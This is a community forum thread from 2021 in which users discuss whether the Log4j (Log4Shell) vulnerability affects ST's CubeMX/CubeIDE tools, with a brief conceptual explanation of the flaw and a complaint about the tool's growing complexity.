FAQs
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Stcube and log4j

Go to solution
Uwe Bonnes
Principal III

‎2021-12-15 07:37 AM

 
Labels:
0 Kudos
1 ACCEPTED SOLUTION

Accepted Solutions
7 REPLIES 7
Go to solution
Uwe Bonnes
Principal III

‎2021-12-15 07:42 AM

Sorry, somehow I managed to drop the question:

During startup, stcube prints a message about log4j. There are known vulnrerabilities about log4j. How does this impact stcube and the host system, stcube runs on?

0 Kudos
Go to solution
TDK
Guru

‎2021-12-15 09:43 AM

Apparently the version used is so out of date that it's "safe". Not sure I'd trust that answer.

See: https://community.st.com/s/question/0D53W00001FmB6NSAV/i-am-using-cubemx-there-is-a-significant-security-vulnerability-of-apache-log4j-on-net-cubemx-has-this-issue-if-yes-do-you-have-any-fix-solution

If you feel a post has answered your question, please click "Accept as Solution".
0 Kudos
Go to solution
waclawek.jan
Guru

‎2021-12-15 01:06 PM

I wonder how exactly could an outside attacker achieve an entry to be inserted to CubeIDE/ CubeWhatever's log...

Do these programs have open listening IP ports?

JW

0 Kudos
Go to solution
TDK
Guru
In response to waclawek.jan

‎2021-12-15 01:41 PM

It will try to format the log message and if you have certain patterns in the message being logged, it will load an arbitrary file from a web address to do so. So if you can control what is being logged, perhaps if the program logs user input, you're toast.

It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep that it is even possible for this to happen. I'm not surprised it happened in Java.

I find it all quite interesting.

https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html

If you feel a post has answered your question, please click "Accept as Solution".
0 Kudos
Go to solution
waclawek.jan
Guru

‎2021-12-15 07:40 PM

I understand the mechanism of the bug. My question was towards how

> if you can control what is being logged,

can happen in the particular case of Cuben.

JW

0 Kudos
Go to solution
Piranha
Chief II
In response to TDK

‎2021-12-19 05:17 PM

> It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep

That is also the past and future of the CubeMX. It started as a Microcontroller eXplorer and helped managing pins and clocks. Then the "initialization code generator" was added. Officially it's still called like that! But in reality it has gone down the full - "I'm clicking a project together completely in CubeMX. Something doesn't work. I no learn C. Help!!! Thank you, ser!" - mode. And even sane users want more and more customization. Initialization order, priorities, enable/disable by default etc. Eventually it will mimic all of the HAL in a million configurations, it will require the same amount of knowledge and be more complex to configure than writing a code, and the project will collapse under it's own weight.

0 Kudos
Top